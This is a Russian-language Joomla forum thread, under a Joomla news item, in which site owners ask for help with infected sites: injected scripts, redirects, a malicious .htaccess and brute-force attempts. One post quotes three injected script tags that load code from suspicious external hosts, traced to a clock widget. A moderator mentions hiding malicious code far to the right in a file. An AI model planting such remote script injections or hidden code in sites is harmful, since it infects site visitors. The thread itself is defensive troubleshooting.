Новости Joomla

Joomla официально признана цифровым общественным благом Joomla с гордостью сообщает, что была...

Joomla официально признана цифровым общественным благом 🙏🎉Joomla с гордостью сообщает, что была официально признана цифровым общественным благом (Digital Public Good, DPG) Альянсом цифровых общественных благ (Digital Public Goods Alliance, DPGA) — инициативой, поддерживаемой Организацией Объединённых Наций.Это признание ставит Joomla! в ряд международных open-source проектов, которые разделяют ценности открытости, прозрачности, защиты данных и социального воздействия. Важно отметить, что статус цифрового общественного блага присвоен самому программному решению Joomla!, а не организации Joomla как юридическому лицу.Альянс цифровых общественных благ (DPGA) ведёт международный реестр цифровых общественных благ и оценивает проекты на основе чётко определённых стандартов. Его миссия — поддержка открытых технологий, способствующих достижению Целей устойчивого развития ООН (UN SDGs) и решению глобальных задач развития. 🌐Чтобы получить статус цифрового общественного блага, проект должен соответствовать Стандарту цифровых общественных благ (Digital Public Goods Standard), который включает следующие критерии:✔️ Открытое лицензирование (например, использование признанных open-source лицензий)✔️ Защита данных и безопасность✔️ Соответствие правовым и этическим нормам✔️ Вклад в достижение Целей устойчивого развития ООН✔️ Прозрачное управление и долгосрочная устойчивость✔️ Активное вовлечение сообществаПолучение статуса цифрового общественного блага — процесс далеко не автоматический. Joomla прошла тщательную процедуру оценки, которая потребовала предоставления подробной документации и доказательств соответствия строгим стандартам.Благодаря самоотверженной работе множества участников сообщества, этот результат стал наглядным подтверждением универсальности и открытости Joomla, а также бесчисленных способов, с помощью которых она помогает людям создавать веб-решения.Это достижение подчёркивает позицию Joomla как одной из самых надёжных и гибких open-source CMS в мире — системы, которая продолжает давать возможность разработчикам, организациям и государственным структурам создавать открытые, безопасные и инклюзивные цифровые решения.Оригинал новости

0 Пользователей и 1 Гость просматривают эту тему.
  • 792 Ответов
  • 290815 Просмотров
*

Jiraff

  • Новичок
  • 6
  • 0 / 0
  • Вчера всё работало)
.htaccess смотрел?
Да в нём только строчка
Код
php_value memory_limit 128M
ещё нашёл с помощью файрбага что в начале страницы подгружаются скрипты вот такие:
Код
<script src="http://12aa7d99dd76180f9169daade0da799213.smotri-kino.pp.ua/?967553=9bz186fj7e7i6ujl8ryzsbE">
<script src="http://sea.waveview.info/uk//?767796=QAlHTVpXEkFBXVAJBFEHAg0NVQQZVwACBBkFBVEGGQ0MB1YZBAQGAQ0EAgxVDQZQ">
<script src="http://12aa7d99dd76180f9169daade0da799213.smotri-kino.pp.ua/?768491=n9aZmZ_NiYeEiICCj5jW2dvbzZ-ZmKCOktbS3dze3tjNnoKP1tuO2N3S0orbxojf3dvG2tqO2cbS09iJxtvb2d7S293TitLZj82ej4qfitaO29jbitjb28aI39jSxtrajtnG0tPYicbb29ne0tvd04rS2Y_NnIKPn4PW2tjd3c2DjoKMg5_W3N3T">
А в каком месте искать этот код в файлах я не знаю, может в шаблоне? не могу найти. Мне эти скрипты кажутся подозрительными...
*

wishlight

  • Гуру
  • 5071
  • 319 / 1
  • От 300 руб быстрый хостинг. Сервера.
Опять гадят в джаваскрипты. Что на сайте стоит, и какой версии?
*

draff

  • Гуру
  • 5801
  • 434 / 7
  • ищу работу
Jiraff
Замени на стандартный .htaccess и index.php в корне сайта.
А код ищи по маске, указанному как путь к яваскрипту, base64_decode
*

Jiraff

  • Новичок
  • 6
  • 0 / 0
  • Вчера всё работало)
Всем спасибо за помощь! Бяку нашёл. Все скрипты прописывались динамически их нигде так не найти было. Я уже грешил на то что обновление ставил и для Joomla самой и для модулей каких не помню, а оказалась дрянь в том на что даже и думать не думал. Устанавливал виджет с часами с сайта 101widgets.com вот он эту дрянь и генерировал. Виджет убрал, ничего не выскакивает. А он такой детский был, безобидный  :laugh: ребёнок у школьной доски где мелом время тикает (сайт у меня детской тематики)
Никогда не ставьте с него виджеты.
*

verstalshik

  • Завсегдатай
  • 1754
  • 95 / 1
а еще лучше - вообще не ставить все эти прибамбасы))) часики, блин, курсы валют))) хех, тяжелое наследие юкоза
❶ НЕ СПРАВЛЯЕШЬСЯ САМ???  Поможем тут...  ❷ Калькулятор доставки - ЗАКАЖИ!!!...  ❸ Каталог компаний - ЖМИ!!!...  ❹ НОВИЧКИ! ВСЕ сюда! Первая консультация БЕСПЛАТНО!!
*

WebDisaster

  • Захожу иногда
  • 108
  • 12 / 0
Посоветуйте пожалуйста, что делать?
Наплевать. Слюной.

Это вообще опасно?
Разве что для психики бота.
*

Jiraff

  • Новичок
  • 6
  • 0 / 0
  • Вчера всё работало)
а еще лучше - вообще не ставить все эти прибамбасы))) часики, блин, курсы валют))) хех, тяжелое наследие юкоза
теперь точно ничего не буду ставить))
*

denn70

  • Захожу иногда
  • 110
  • 2 / 0
Добрый день, кто подскажет, как можно найти редирект на сайте? Точнее его существование. Дело в том, что Google Adwords банит рекламу моего сайта в связи с вредоносным ПО. Первые разы действительно находили вирус. А последние разы ничего найти не можем, и сканером прогонял, скрипт слежения изменения файлов на крон повесил. Движок с нуля ставили. Ничего нет.

Если Google видит редирект, то как то же он его находит) Хотелось бы и мне найти, чтобы уже точно знать что где то засел вирус, и копать дальше
*

flyingspook

  • Moderator
  • 3590
  • 247 / 9
Цитировать
Если Google видит редирект, то как то же он его находит)
ну думаю по принципу того как вы его искали
самое главное что редирект Google увидеть проще чем вам найти его в коде
просто повторно при поиске пропустили, есть много вариантов убрать его с глаз
один из них
записать далеко в право в файле а вы при открытии блокнотом нижний скроллинг не догадаетесь прокрутить и вуаля файл посмотрели а злой код не увидели
это как пример ну а остальное все интуитивно одинаково, ловкость рук и ни какого мошенничества

повторюсь сайт не чистится нажатием одной кнопки и каждый случай не похож, только если массово, но после массового взлома приходят остальные к открытой кормушке, и считать что у вас взлом как и у всех это ошибка, требуется все проверять и не думать что все почищено потому что кто то написал какие и где файлы и какие и где коды, нет у вас все может и даже не может а есть по другому, и даже на соседнем вашем же сайте все не так как тут, если этот принцип поймете то всегда дочистите все до конца

сайт надо тщательно вычищать и даже те кто умеет делают это 2-8 часов !важно даже они это делают зная где и что
и самое главное обновить все что требуется, либо отказаться от расширений в которых периодически находят уязвимости
ну а те кто не знает могут и пол года искать
« Последнее редактирование: 28.05.2013, 18:11:20 от flyingspook »
*

Tsvet

  • Новичок
  • 2
  • 0 / 0
У меня заразились все файлы .htaccess редиректом опять. Хотя я все файлы вычистила и поменяла пароли.
Подскажите, что делать?
*

denn70

  • Захожу иногда
  • 110
  • 2 / 0
записать далеко в право в файле а вы при открытии блокнотом нижний скроллинг не догадаетесь прокрутить и вуаля файл посмотрели а злой код не увидели
Скролил уже и вдоль и поперек


повторюсь сайт не чистится нажатием одной кнопки и каждый случай не похож, только если массово, но после массового взлома приходят остальные к открытой кормушке, и считать что у вас взлом как и у всех это ошибка, требуется все проверять и не думать что все почищено потому что кто то написал какие и где файлы и какие и где коды, нет у вас все может и даже не может а есть по другому, и даже на соседнем вашем же сайте все не так как тут, если этот принцип поймете то всегда дочистите все до конца

На быстрое решение вопроса не надеюсь. ПРи общении с поддержкой Google, они прислали адрес js файла, где  по их мнению сидит редирект. Файл как вчера чистый заливали на сайт, так он и не менялся. Сравнивал его с оригиналом из дистрибутива.  Нет там ниче.Сайт уже просканировал на все что можно, что отлавливал раньше, и на что жаловались форумчане.

При этом конечно я не исключаю, что где он сидит(
*

profi_spb

  • Новичок
  • 3
  • 0 / 0
У меня заразились все файлы .htaccess редиректом опять. Хотя я все файлы вычистила и поменяла пароли.
Подскажите, что делать?

Какая версия Joomla у Вас сейчас установлена?
*

profi_spb

  • Новичок
  • 3
  • 0 / 0
Скролил уже и вдоль и поперек


На быстрое решение вопроса не надеюсь. ПРи общении с поддержкой Google, они прислали адрес js файла, где  по их мнению сидит редирект. Файл как вчера чистый заливали на сайт, так он и не менялся. Сравнивал его с оригиналом из дистрибутива.  Нет там ниче.Сайт уже просканировал на все что можно, что отлавливал раньше, и на что жаловались форумчане.

При этом конечно я не исключаю, что где он сидит(

URL сайт пришлите.
*

draff

  • Гуру
  • 5801
  • 434 / 7
  • ищу работу
denn70
кроме адсенса, еще партнерки есть на сайте?
*

flyingspook

  • Moderator
  • 3590
  • 247 / 9
Google сам себя считает сомнительным сайтом))
либо вас еще не перепроверили либо есть что то в файлах, но может быть и ошибка Google такое бывает и не редко просто через время все нормализуется
*

denn70

  • Захожу иногда
  • 110
  • 2 / 0
denn70
кроме адсенса, еще партнерки есть на сайте?

У меня не адсенс, а adwords, т.е Google не хочет рекламировать сайт, из-за вируса
*

denn70

  • Захожу иногда
  • 110
  • 2 / 0
Google сам себя считает сомнительным сайтом))
либо вас еще не перепроверили либо есть что то в файлах, но может быть и ошибка Google такое бывает и не редко просто через время все нормализуется


Я вот тоже про это и подумал, что может не актуальная инфа, но пишут, что проверили пару часов назад, и редирект о прежнему на сайте.
 Возьму отдельный хостинг для сайта, и заново склепаю, чтоб вообще никакой связи не было с этим аккаунтом, а то там еще с десяток сайтов, хоть и ничего не нашел на них.
*

denn70

  • Захожу иногда
  • 110
  • 2 / 0
Какая версия Joomla у Вас сейчас установлена?

1.5.26 сейчас
*

Alex Kop

  • Захожу иногда
  • 111
  • 1 / 0
1.5.26 сейчас
Подскажите кто-нибудь, никак не пойму, для чего вообще пользоваться такими старыми версиями, можно ведь обновить без проблем, у меня например 2.5.9 сейчас? Мой сайт изначально был сделан на версии 1.6 и ниче, как то обновился)
« Последнее редактирование: 28.05.2013, 21:58:03 от Alex Kop »
*

borada

  • Захожу иногда
  • 182
  • 13 / 0
Подскажите кто-нибудь, никак не пойму, для чего вообще пользоваться такими старыми версиями, можно ведь обновить без проблем, у меня например 2.5.9 сейчас?
Когда захочется переделать полсайта с нуля - обязательно перейдут на последние версии. У меня несколько сайтов работает, и нормально если бы не эта вирусня в последнее время. Новые сайты, конечно, у же на других версиях делаются.
*

flyingspook

  • Moderator
  • 3590
  • 247 / 9
Цитировать
у меня например 2.5.9 сейчас
обновить на 2.5.11 не про бывали ^-^
вы еще ссылку на сайт напишите к версии, и удача к вам неминуемо придет  ;)
*

denn70

  • Захожу иногда
  • 110
  • 2 / 0
Подскажите кто-нибудь, никак не пойму, для чего вообще пользоваться такими старыми версиями, можно ведь обновить без проблем, у меня например 2.5.9 сейчас? Мой сайт изначально был сделан на версии 1.6 и ниче, как то обновился)

Ну мой сайт изначально был сделан на голом HTML, (тогда еще 1.5 тока тока стал развиваться),  потом Joostina была, потом J1.5, и каждый раз это долбанный геморрой с переходом. Поэтому и 1.5 устраивала. НЕ было никакого желания перескакивать на 1.6, потом 2.5. Ради интереса обновляться как то не хотелось.

Ну а из-за ерунды с вирусом, вот перейду сразу на «последнюю актуальную версию»))))
*

Alex Kop

  • Захожу иногда
  • 111
  • 1 / 0
обновить на 2.5.11 не про бывали ^-^
не пробовал, у меня в панели управления "версия Joomla! самая новая" 2.5.9
*

WebDisaster

  • Захожу иногда
  • 108
  • 12 / 0
Подскажите кто-нибудь, никак не пойму, для чего вообще пользоваться такими старыми версиями, можно ведь обновить без проблем, у меня например 2.5.9 сейчас? Мой сайт изначально был сделан на версии 1.6 и ниче, как то обновился)
Тот, кто этого не понимает, просто слишком мало прожил и потому предельно наивен. Вот когда сделаешь свой первый сайт хотя бы на 10 тысяч страниц контента, каждый день будешь тратить по нескольку часов только на добавление нового и без вомзожности "остановить" сайта хотя бы на один-три дня, перепишешь "под себя" несколько десятков модулей и компонентов, я посмотрю, как ты будешь его "обновлять без проблем". Довести до ума безопасность уже имеющегося сайта получается на три порядка быстрее и проще.
*

denn70

  • Захожу иногда
  • 110
  • 2 / 0
Тот, кто этого не понимает, просто слишком мало прожил и потому предельно наивен. Вот когда сделаешь свой первый сайт хотя бы на 10 тысяч страниц контента, каждый день будешь тратить по нескольку часов только на добавление нового и без вомзожности "остановить" сайта хотя бы на один-три дня, перепишешь "под себя" несколько десятков модулей и компонентов, я посмотрю, как ты будешь его "обновлять без проблем". Довести до ума безопасность уже имеющегося сайта получается на три порядка быстрее и проще.

Согласен, в пределах одной ветки развития, 1.5 или 2.5 обновляться норм. А вот с одного на другое проблемно, если много чего стороннего навешано было. Я вот сайт визитку два дня обновлял с 1,5 на 2.5. На 1.5 была стабильная связка компонентов, а на 2.5 nt;t самые компоненты дают той же стабильной связки)))
*

verstalshik

  • Завсегдатай
  • 1754
  • 95 / 1
а что там за компоненты для сайта-визитки? насмешили))))
шаблон за полдня переделывается - и это с остановками на коньяк...
контент из базы в базу - 15 минут максимум, хотя какой там контент на сайте-визитке?)))
❶ НЕ СПРАВЛЯЕШЬСЯ САМ???  Поможем тут...  ❷ Калькулятор доставки - ЗАКАЖИ!!!...  ❸ Каталог компаний - ЖМИ!!!...  ❹ НОВИЧКИ! ВСЕ сюда! Первая консультация БЕСПЛАТНО!!
*

wishlight

  • Гуру
  • 5071
  • 319 / 1
  • От 300 руб быстрый хостинг. Сервера.
Вот... А если еще и все шаблоны компонентов переписаны... Дали на лечение такой сайт. Печально мучался. Просто так не обновишь, верстка лезет.
*

flyingspook

  • Moderator
  • 3590
  • 247 / 9
умников много кто думает за пол дня справиться  :laugh: я вас умоляю не смешите
или это такое название временное двух недель? а то и месяца? может отстал от сленга
или пиар такой?
*

borada

  • Захожу иногда
  • 182
  • 13 / 0
Давайте не будем ОФФТОПИТЬ
*

dormidont

  • Осваиваюсь на форуме
  • 19
  • 0 / 0
Сейчас испытал несколько адреналинных секунд, пытаясь зайти в админку и тупо пялясь на сообщение: "403 Forbidden Доступ запрещен". Хотя сам сайт сам открывался. Потом допер глянуть папочку httpdocs/administrator/.. (слава богу c ftp было всё в  порядке). Вижу там самонародившийся htaccess с дружеским посылом:
Спойлер
[свернуть]
Думаю теперь всё же заняться составлением списка айпишек всех моих провайдеров..
А вот так, примерно, выглядел тот самый брутфорс (собственно, глядя на это порно, понимаешь -  насколько смешно банить отдельные ip)
Спойлер
[свернуть]
Так шо, ребята, держитесь! То ли ещё будет..
« Последнее редактирование: 02.06.2013, 23:41:36 от dormidont »
Чтобы оставить сообщение,
Вам необходимо Войти или Зарегистрироваться
 

Редирект на спам ссылки. Как лчить?

Автор Евгений1980

Ответов: 2
Просмотров: 2394
Последний ответ 14.02.2024, 13:15:59
от wishlight
Скрипт для поиска вирусов и вредоносных скриптов на сайте "AI-Bolit"

Автор revisium

Ответов: 110
Просмотров: 70795
Последний ответ 30.08.2023, 12:53:33
от SeBun
Вирус редирект или взлом с редиректом Joomla 3.10

Автор Wany205

Ответов: 1
Просмотров: 3372
Последний ответ 25.05.2023, 08:49:57
от Театрал
Re: Кажется вирус на сайте

Автор motokraft

Ответов: 24
Просмотров: 5043
Последний ответ 04.05.2022, 14:04:17
от ProtectYourSite
Хостинг пишет, что найден вирус в /media/com_media/js/media-manager-es5.js

Автор AlexP750

Ответов: 6
Просмотров: 3456
Последний ответ 22.02.2022, 11:38:15
от AlexP750